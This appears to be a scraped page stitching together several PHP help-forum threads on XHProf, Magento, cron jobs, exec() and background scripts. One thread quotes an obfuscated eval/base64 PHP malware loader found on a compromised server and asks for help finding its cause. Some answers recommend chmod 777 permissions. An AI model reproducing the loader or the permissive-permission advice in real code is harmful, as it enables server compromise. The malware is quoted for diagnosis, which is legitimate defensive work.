Invalid Run Id After running drupal page using XHProf - php

I have installed the Drupal XHProf 7.x-1.0-beta2 module and enabled it on the Modules page of my site.
I have turned enabled the use of the module at Configuration -> Development -> XHProf settings (/admin/config/development/xhprof) by checking ON " Enable profiling of all page views and drush requests. "
Now what?
When I visit a page and click "XHProf output" at the bottom of the page, I get this error:
" Run #51b789ae8cea0: Invalid Run Id = 51b789ae8cea0 "
And the list of the "Top 100 functions" is totally empty. I am a bit lost as to what I should be seeing or where to go from here. Any help greatly appreciated.
please refer error screenshot

Go to your backend folder structure.create a folder named xhprof in your server, inside tmp folder in your server like
on clicking "XHProf output" at the bottom of the will display output.

Looking at the code that returns this error it's a file exists check. I changed $run_desc to output the full filename vs the run id.
if (!file_exists($file_name)) {
xhprof_error("Could not find file $file_name");
$run_desc = "Invalid Run Id = $file_name";
return null;
In my case for a run id of 617064cfe0f71 it was looking for a filename formatted like
The filename is derived from this function
private function file_name($run_id, $type) {
$file = "$run_id.$type." . $this->suffix;

It's a permission issue,just set chmod 777 for your xhprof output directory.


Magento connect manager showing blank page

I am running a magento site but when i click on magento connect manager. it displays blank page. i have enabled error mode but it doesn't show any error or no log as well
You have another option , paste the extension key in below link and get the extensions files and install it manually :
Whenever this happens the first thing I check is the PHP memory limit.
Magento overrides the normal error handler with it's own, but when the error is "Out of memory" that custom handler cannot run, so nothing is seen.
And Other Suggestion
I was also facing this error. The error has been fixed by changing content of core function getRowUrl in app\code\core\Mage\Adminhtml\Block\Widget\Grid.php The core function is :
public function getRowUrl($item)
$res = parent::getRowUrl($item);
$res = parent::getRowUrl($item);
Replaced with :
public function getRowUrl($item)
return $this->getUrl(’*/*/edit’, array(’id’ => $item->getId()));

Malware PHP files are getting created automatically

We have AWS ec2 instance with CentOs. There are 4 sites hosted on this instance, one static HTML and PHP site, two Joomla (v3.4.5), one Opencart (v2.0.1.1).
Yesterday we found few files which are not related to our codebase, seems malware. We executed egrep -Rl 'function.*for.*strlen.*isset' /home/ and found that there are few files with following sample code.
function rjlynu($vkofjapoz, $avsepejks){$gjcdh = ''; for($i=0; $i < strlen($vkofjapoz); $i++){$gjcdh .= isset($avsepejks[$vkofjapoz[$i]]) ? $avsepejks[$vkofjapoz[$i]] : $vkofjapoz[$i];}
$jcmkpl="base64_decode";return $jcmkpl($gjcdh);}
$fkcrhcwlxx = 'KAYS3ymsuxKqMLBk10JIDxYauxMVX0MsMVddThITKAYS3ymsuxKqML5HupmY18MH18F8EcNkldkNuxMV'.
$ghjnzmrjlg = Array('1'=>'c', '0'=>'3', '3'=>'a', '2'=>'e', '5'=>'x', '4'=>'C', '7'=>'j', '6'=>'F', '9'=>'5', '8'=>'n', 'A'=>'G', 'C'=>'t', 'B'=>'R', 'E'=>'L', 'D'=>'Y', 'G'=>'N', 'F'=>'M', 'I'=>'s', 'H'=>'v', 'K'=>'Q', 'J'=>'B', 'M'=>'J', 'L'=>'2', 'O'=>'I', 'N'=>'A', 'Q'=>'0', 'P'=>'h', 'S'=>'u', 'R'=>'U', 'U'=>'E', 'T'=>'K', 'W'=>'8', 'V'=>'y', 'Y'=>'l', 'X'=>'b', 'Z'=>'W', 'a'=>'f', 'c'=>'D', 'b'=>'k', 'e'=>'i', 'd'=>'w', 'g'=>'6', 'f'=>'m', 'i'=>'H', 'h'=>'T', 'k'=>'p', 'j'=>'r', 'm'=>'9', 'l'=>'O', 'o'=>'q', 'n'=>'7', 'q'=>'o', 'p'=>'1', 's'=>'z', 'r'=>'4', 'u'=>'Z', 't'=>'d', 'w'=>'g', 'v'=>'P', 'y'=>'V', 'x'=>'X', 'z'=>'S');
eval(rjlynu($fkcrhcwlxx, $ghjnzmrjlg));?>
Even if we remove these files, they get created again and again.
What could be the issue? How can we find the root cause behind this and what is the permanent solution?
lookup access log i believe they are located here /var/log/apache2/access.log
i would also check the folder permission make sure its not something like 777. i would also check for the processes using the ps command from ssh to watch the processes that are running.
i also would make sure to run ClamAV. before all of that i would also make backups of all of the sites and upgrade every plugin you have installed.
good luck with your server.

echo exec working but exec not

I am using red hat enterprise edition n try making a simple php page..
When I try with ...
// html code
echo exec(<cmd>);
// rest html code
Its working fine
but when tried with ...
// html code
// rest html code
Its not working
even a simple command like cat,ls,etc not working and also I tried 2 > &1 then no error is printed .
What could be the possible error ???
return a response from the command, you would need to print the response out as well
$response = array();
exec('whoami', $response);
okkkkkkk ......... I solved the problem. Actually there were two issues ...
The apache user searches its command in /usr/bin folder by default and the command I was trying to use was located in /usr/local/bin. So I need to create a soft link of that command in the /usr/bin directory.
Secondly , apache is a less privilaged user than root so need to on the sticky bit of command so that apache could successfully run the command.
I hope this will help someone else also who will face the same problem in future.

How can I test a CRON job with PHP?

This is the first time I've ever used a CRON.
I'm using it to parse external data that is automatically FTP'd to a subdirectory on our site.
I have created a controller and model which handles the data. I can access the URL fine in my browser and it works (however I will be restricting this soon).
My problem is, how can I test if it's working?
I've added this to my controller for a quick and dirty log
$file = 'test.txt';
$contents = '';
if (file_exists($file)) {
$contents = file_get_contents($file);
$contents .= date('m-d-Y') . ' --- ' . PHP_SAPI . "\n\n";
file_put_contents($file, $contents);
But so far only got requests logged from myself from the browser, despite having my CRON running ever minute.
03-18-2010 --- cgi-fcgi
03-18-2010 --- cgi-fcgi
I've set it up using cPanel with the command
index.php properties/update/
the 2nd portion is what I use to access the page in my browser.
So how can I test this is working properly, and have I stuffed anything up?
Note: I'm using Kohana 3.
Many thanks
You're not using the correct command for calling Kohana.
Make sure you're using the full path to index.php so you can eliminate any path errors. Here are the switches available for use in Kohana:
--uri: Self explanatory
--method: HTTP Request method (POST, GET, etc ...) (Overrides Kohana::$method)
--get: Formatted GET data
--post: Formatted POST data
You should be using something like this:
php /path/to/kohana/directory/index.php --uri=properties/update/
I can't remember if you need double quotes around the value, don't forget to try that if it doesn't work.
you probably aren't running Cron with root permissions on that file.
put mailto="youremail#yourdomain.tld" at the start of the cron file to have it email you errors.
If you don't have root access to the cron file (I.E. SSH) I don't know if you can do this in cPanel.

Background script on shared host with multiple PHP versions installed

I was needing a way to generate thumbnails (using PHP5) for an image management script and had a problem where my host has multiple versions of PHP installed (4 and 5), with PHP4 set as default. This meant that any calls to php from the CLI would run PHP4. I've come up with the following as what I hope to be a cross platform solution. I'm posting it here primarily as I had a lot of trouble finding any help using Google, so this might help someone in the future, I also have the following questions.
Do you see anything obviously wrong with it?
Are there any other paths to the php5 binary that you know of or know of a better order to have the array for optimisation?
If a host has exec or shell_exec disabled, will the EGalleryProcessQueue.php script be able to be run as a standalone cron job? I don't have access to cron to be able to test this yet. I'm not too worried about this question, as I'll get around to testing it eventually anyway.
Does anyone have any suggestions as to a way in which I can get some feedback as to how far through the images the processing is? See the TODO section of EGalleryProcessQueue.php I'd like to display a progress bar when it's in the admin section.
Main script
* Writes the array to a text file in /path/to/gallery/needsThumbs.txt for batch processing.
* Runs the thumbnail generator script in the background.
* #param array $_needsThumbs the array of images needing thumbnails
private function generateThumbnails($_needsThumbs)
$Command = realpath(dirname(__FILE__)).DIRECTORY_SEPARATOR.'EGalleryProcessQueue.php '.$this->_realpath.' '.$this->thumbnailWidth.' '.$this->thumbnailHeight;
if(PHP_SHLIB_SUFFIX == 'so')// *nix (aka NOT windows)
* We need to make sure we are using the right PHP version
* (problems with shared hosts that have PHP4 and PHP5 installed,
* but PHP4 set as default).
$phpPaths = array('php', '/usr/local/bin/php', '/usr/local/php5/bin/php', '/usr/bin/php', '/usr/bin/php5');
foreach($phpPaths as $path)
exec("echo '<?php echo version_compare(PHP_VERSION, \"5.0.0\", \">=\"); ?>' | $path", $result);
shell_exec("nohup $path $Command 2> /dev/null > /dev/null &");
else // Windows
$WshShell = new COM("WScript.Shell");
$WshShell->Run("php.exe $Command", 0, false);
if ($argc === 4 && strstr($argv[0], basename(__FILE__))) {
// File is being called by the CLI and has not been included by another script
// Either no thumbnails need to be created or a wrong directory has been supplied
$generator = new EGalleryThumbGenerator;
$generator->directory = $argv[1];
$generator->thumbnailWidth = is_int($argv[2]) ? $argv[2] : 128;
$generator->thumbnailHeight = is_int($argv[3]) ? $argv[3] : 128;
// $generator->processImages() returns the number of images left to process (it does them in blocks of 10)
while (($i = $generator->processImages()) > 0)
* TODO Can we get some sort of feedback to the user here?
* Possibly so that we can display a progress bar in the management section.
* Probably have to write $i to a file to be read by the main script.
Do you see anything obviously wrong with it?
Nope, the code looks good.
Are there any other paths to the php5 binary that you know of or know of a better order to have the array for optimization?
This is a hard question to answer, as PHP could be installed anywhere on a server. The paths you have seem to be very logical to me, but there could be any number of other places it could be installed.
Rather than providing a bunch of directories where PHP5 might be installed, what about having a parameter the user has to set to provide the path to the PHP5 executable if it's not in their $PATH?
If a host has exec or shell_exec disabled, will the EGalleryProcessQueue.php script be able to be run via a cron job?
I haven't tested it, but I would assume that would prevent the script from running.
Does anyone have any suggestions as to a way in which I can get some feedback as to how far through the images the processing is? See the TODO section of EGalleryProcessQueue.php I'd like to display a progress bar when it's in the admin section.
Store the number of images completed somewhere (file, db, maybe even session var) and have an AJAX call fire every second or so to a function that provides done vs total. Then use something like
